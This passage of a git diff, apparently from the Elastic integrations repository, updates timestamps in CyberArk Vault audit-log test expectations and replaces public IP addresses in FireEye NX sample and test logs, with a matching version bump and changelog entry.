@@ -259,7 +236,7 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-06-09T10:24:37.546546700Z", + "ingested": "2021-12-09T13:37:14.711403400Z", "original": "\u003c5\u003e1 2021-03-11T19:45:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:45:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:45:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e98\u003c/MessageID\u003e\\n \u003cDesc\u003eOpen File (Write Only)\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eOpen File (Write Only)\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePVWAConfig\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PVConfiguration.xml\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eOpen File (Write Only)\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:45:26\",\"IsoTimestamp\":\"2021-03-11T19:45:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write 
Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "98", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json index 9b502fb1c06..cd746dd1cb6 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "open file", - "ingested": "2021-06-09T10:24:37.636379200Z", + "ingested": "2021-12-09T13:37:15.063025200Z", "original": "\u003c5\u003e1 2021-03-04T19:10:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:05\",\"IsoTimestamp\":\"2021-03-04T19:10:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"99\",\"Desc\":\"Open File\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Open File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\EPMConfiguration.xml\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File\",\"GatewayStation\":\"\"}}}", "code": "99", "kind": "event" 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json index 9dee3458ac5..18b20cc2947 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json @@ -45,7 +45,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-06-09T10:24:37.659605700Z", + "ingested": "2021-12-09T13:37:15.166336200Z", "original": "Mar 08 03:41:01 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManagerShared\",\"File\":\"Root\\\\Policies\\\\Policy-BusinessWebsite.ini\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json index bd0aeb6e680..b23043495f1 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json 
@@ -49,7 +49,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:37.684018100Z", + "ingested": "2021-12-09T13:37:15.267387900Z", "original": "\u003c5\u003e1 2021-03-04T17:27:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:14\",\"IsoTimestamp\":\"2021-03-04T17:27:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -116,7 +116,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:37.684022300Z", + "ingested": "2021-12-09T13:37:15.267396800Z", "original": "\u003c5\u003e1 2021-03-04T17:27:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:21\",\"IsoTimestamp\":\"2021-03-04T17:27:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", 
@@ -186,7 +186,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-06-09T10:24:37.684023500Z", + "ingested": "2021-12-09T13:37:15.267402800Z", "original": "\u003c5\u003e1 2021-03-04T17:27:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:21\",\"IsoTimestamp\":\"2021-03-04T17:27:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManagerShared\",\"File\":\"Root\\\\Policies\\\\Policy-GenericWebApp.ini\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" @@ -241,7 +241,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:37.684024500Z", + "ingested": "2021-12-09T13:37:15.267408600Z", "original": "\u003c5\u003e1 2021-03-04T17:27:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:33\",\"IsoTimestamp\":\"2021-03-04T17:27:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", diff --git a/packages/cyberarkpas/manifest.yml b/packages/cyberarkpas/manifest.yml index f8b61b26e55..77ca5219bda 100644 --- a/packages/cyberarkpas/manifest.yml 
+++ b/packages/cyberarkpas/manifest.yml
@@ -1,6 +1,6 @@
 name: cyberarkpas
 title: CyberArk Privileged Access Security Logs
-version: 2.2.0
+version: 2.2.1
 release: ga
 description: Collect audit logs from Cyberark Vault servers with Elastic Agent.
 type: integration
diff --git a/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log b/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log
index 11fbc6883eb..a8930a3c74a 100644
--- a/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log
+++ b/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log
@@ -1,11 +1,11 @@ {"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.991339+0000\",\"flow_id\":721570461162990,\"event_type\":\"flow\",\"src_ip\":\"fe80:0000:0000:0000:feec:daff:fe31:b706\",\"src_port\":45944,\"dest_ip\":\"ff02:0000:0000:0000:0000:0000:0000:0001\",\"dest_port\":10001,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tc\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":8,\"pkts_toclient\":0,\"bytes_toserver\":1680,\"bytes_toclient\":0,\"start\":\"2020-09-22T08:34:12.761326+0000\",\"end\":\"2020-09-22T08:34:12.761348+0000\",\"age\":0,\"state\":\"new\",\"reason\":\"timeout\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":520,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993228+0000\",\"flow_id\":175370876476591,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":39808,\"dest_ip\":\"202.65.114.202\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:33:15.122031+0000\",\"end\":\"2020-09-22T08:33:15.193693+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":475,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} 
+{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993228+0000\",\"flow_id\":175370876476591,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":39808,\"dest_ip\":\"67.43.156.14\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:33:15.122031+0000\",\"end\":\"2020-09-22T08:33:15.193693+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":475,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993227+0000\",\"flow_id\":1285126005631046,\"event_type\":\"flow\",\"src_ip\":\"fe80:0000:0000:0000:feec:daff:fe31:b706\",\"src_port\":44535,\"dest_ip\":\"ff02:0000:0000:0000:0000:0000:0000:0001\",\"dest_port\":10001,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tc\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":8,\"pkts_toclient\":0,\"bytes_toserver\":1680,\"bytes_toclient\":0,\"start\":\"2020-09-22T08:34:22.763974+0000\",\"end\":\"2020-09-22T08:34:22.764073+0000\",\"age\":0,\"state\":\"new\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":522,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} 
-{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993286+0000\",\"flow_id\":222460015300681,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.150\",\"src_port\":51082,\"dest_ip\":\"213.227.168.146\",\"dest_port\":5938,\"proto\":\"TCP\",\"proto_number\":6,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":799,\"pkts_toclient\":544,\"bytes_toserver\":69825,\"bytes_toclient\":59808,\"start\":\"2020-09-22T04:48:48.282697+0000\",\"end\":\"2020-09-22T08:34:36.067255+0000\",\"age\":13548,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false},\"tcp\":{\"tcp_flags\":\"1a\",\"tcp_flags_ts\":\"1a\",\"tcp_flags_tc\":\"1a\",\"syn\":true,\"psh\":true,\"ack\":true,\"state\":\"established\"}}\n","meta_sip4":"192.168.1.99","meta_oml":611,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993501+0000\",\"flow_id\":1463569002949603,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":52147,\"dest_ip\":\"202.28.116.236\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:32:06.355299+0000\",\"end\":\"2020-09-22T08:32:06.439495+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":476,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:01.175635+0000\",\"flow_id\":1136872856843530,\"iface\":\"pether3\",\"event_type\":\"tls\",\"src_ip\":\"192.168.1.99\",\"src_port\":53918,\"dest_ip\":\"162.159.246.125\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=fireeye.com\",\"issuerdn\":\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC 
CA-3\",\"ja3\":{\"hash\":\"21536525fbf9e289f79e0f98af64bb59\",\"string\":\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\"},\"ja3s\":{\"hash\":\"9873b112313d7c4e5e8ef6207e6c6f0d\",\"string\":\"771,49195,0-65281-11-13172\"},\"fingerprint\":\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\",\"sni\":\"cloud.fireeye.com\",\"version\":\"TLS 1.2\",\"notbefore\":\"2020-07-01T00:00:00.000000+0000\",\"notafter\":\"2021-07-01T12:00:00.000000+0000\",\"client_ciphersuites\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\"client_tls_exts\":[0,11,10,13,15,13172],\"server_ciphersuite\":49195,\"server_tls_exts\":[0,65281,11,13172],\"pubkeylength\":65}}\n","meta_sip4":"192.168.1.99","meta_oml":1146,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} +{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993286+0000\",\"flow_id\":222460015300681,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.150\",\"src_port\":51082,\"dest_ip\":\"67.43.156.15\",\"dest_port\":5938,\"proto\":\"TCP\",\"proto_number\":6,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":799,\"pkts_toclient\":544,\"bytes_toserver\":69825,\"bytes_toclient\":59808,\"start\":\"2020-09-22T04:48:48.282697+0000\",\"end\":\"2020-09-22T08:34:36.067255+0000\",\"age\":13548,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false},\"tcp\":{\"tcp_flags\":\"1a\",\"tcp_flags_ts\":\"1a\",\"tcp_flags_tc\":\"1a\",\"syn\":true,\"psh\":true,\"ack\":true,\"state\":\"established\"}}\n","meta_sip4":"192.168.1.99","meta_oml":611,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} 
+{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993501+0000\",\"flow_id\":1463569002949603,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":52147,\"dest_ip\":\"67.43.156.14\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:32:06.355299+0000\",\"end\":\"2020-09-22T08:32:06.439495+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":476,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} +{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:01.175635+0000\",\"flow_id\":1136872856843530,\"iface\":\"pether3\",\"event_type\":\"tls\",\"src_ip\":\"192.168.1.99\",\"src_port\":53918,\"dest_ip\":\"67.43.156.13\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=fireeye.com\",\"issuerdn\":\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3\",\"ja3\":{\"hash\":\"21536525fbf9e289f79e0f98af64bb59\",\"string\":\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\"},\"ja3s\":{\"hash\":\"9873b112313d7c4e5e8ef6207e6c6f0d\",\"string\":\"771,49195,0-65281-11-13172\"},\"fingerprint\":\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\",\"sni\":\"cloud.fireeye.com\",\"version\":\"TLS 
1.2\",\"notbefore\":\"2020-07-01T00:00:00.000000+0000\",\"notafter\":\"2021-07-01T12:00:00.000000+0000\",\"client_ciphersuites\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\"client_tls_exts\":[0,11,10,13,15,13172],\"server_ciphersuite\":49195,\"server_tls_exts\":[0,65281,11,13172],\"pubkeylength\":65}}\n","meta_sip4":"192.168.1.99","meta_oml":1146,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:19.906154+0000\",\"flow_id\":1444203537876422,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.1.222\",\"src_port\":47220,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with very long lines, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"548d03d3e11c009da833e6e59c4adfee\",\"stored\":false,\"size\":6394,\"tx_id\":0}}\n","meta_sip4":"192.168.1.99","meta_oml":769,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:41.077232+0000\",\"flow_id\":206535698492848,\"iface\":\"pether3\",\"event_type\":\"dns\",\"src_ip\":\"192.168.1.176\",\"src_port\":60269,\"dest_ip\":\"8.8.8.8\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":28224,\"rrname\":\"time-ios.apple.com\",\"rrtype\":\"A\",\"tx_id\":0}}\n","meta_sip4":"192.168.1.99","meta_oml":289,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} 
+{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:41.077232+0000\",\"flow_id\":206535698492848,\"iface\":\"pether3\",\"event_type\":\"dns\",\"src_ip\":\"192.168.1.176\",\"src_port\":60269,\"dest_ip\":\"67.43.156.15\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":28224,\"rrname\":\"time-ios.apple.com\",\"rrtype\":\"A\",\"tx_id\":0}}\n","meta_sip4":"192.168.1.99","meta_oml":289,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:20.318400+0000\",\"flow_id\":1444203537876422,\"iface\":\"pether3\",\"event_type\":\"http\",\"src_ip\":\"192.168.1.222\",\"src_port\":47220,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"tx_id\":1,\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_content_type\":\"application\\/json\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":809}}\n","meta_sip4":"192.168.1.99","meta_oml":598,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:20.672648+0000\",\"flow_id\":1444203537876422,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.100.31\",\"src_port\":5601,\"dest_ip\":\"192.168.1.222\",\"dest_port\":47220,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 
Safari\\/537.36\",\"http_content_type\":\"application\\/json\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":809},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with very long lines, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"ee8b228580c01ae19804cb965451c4b2\",\"stored\":false,\"size\":2398,\"tx_id\":1}}\n","meta_sip4":"192.168.1.99","meta_oml":824,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:21.289128+0000\",\"flow_id\":1444203537876422,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.1.222\",\"src_port\":47220,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with very long lines, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"a32585f392aa640e72431abbb961c255\",\"stored\":false,\"size\":6333,\"tx_id\":2}}\n","meta_sip4":"192.168.1.99","meta_oml":769,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} diff --git a/packages/fireeye/changelog.yml b/packages/fireeye/changelog.yml index 6d780041cc0..6be6284a745 100644 --- a/packages/fireeye/changelog.yml +++ b/packages/fireeye/changelog.yml 
@@ -1,3 +1,8 @@
+- version: "1.1.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.1.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log b/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log
index 499f039a941..cefaa445d76 100644
--- a/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log
+++ b/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log
@@ -1,8 +1,8 @@ {"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.991339+0000\",\"flow_id\":721570461162990,\"event_type\":\"flow\",\"src_ip\":\"fe80:0000:0000:0000:feec:daff:fe31:b706\",\"src_port\":45944,\"dest_ip\":\"ff02:0000:0000:0000:0000:0000:0000:0001\",\"dest_port\":10001,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tc\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":8,\"pkts_toclient\":0,\"bytes_toserver\":1680,\"bytes_toclient\":0,\"start\":\"2020-09-22T08:34:12.761326+0000\",\"end\":\"2020-09-22T08:34:12.761348+0000\",\"age\":0,\"state\":\"new\",\"reason\":\"timeout\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":520,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993228+0000\",\"flow_id\":175370876476591,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":39808,\"dest_ip\":\"202.65.114.202\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:33:15.122031+0000\",\"end\":\"2020-09-22T08:33:15.193693+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":475,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} 
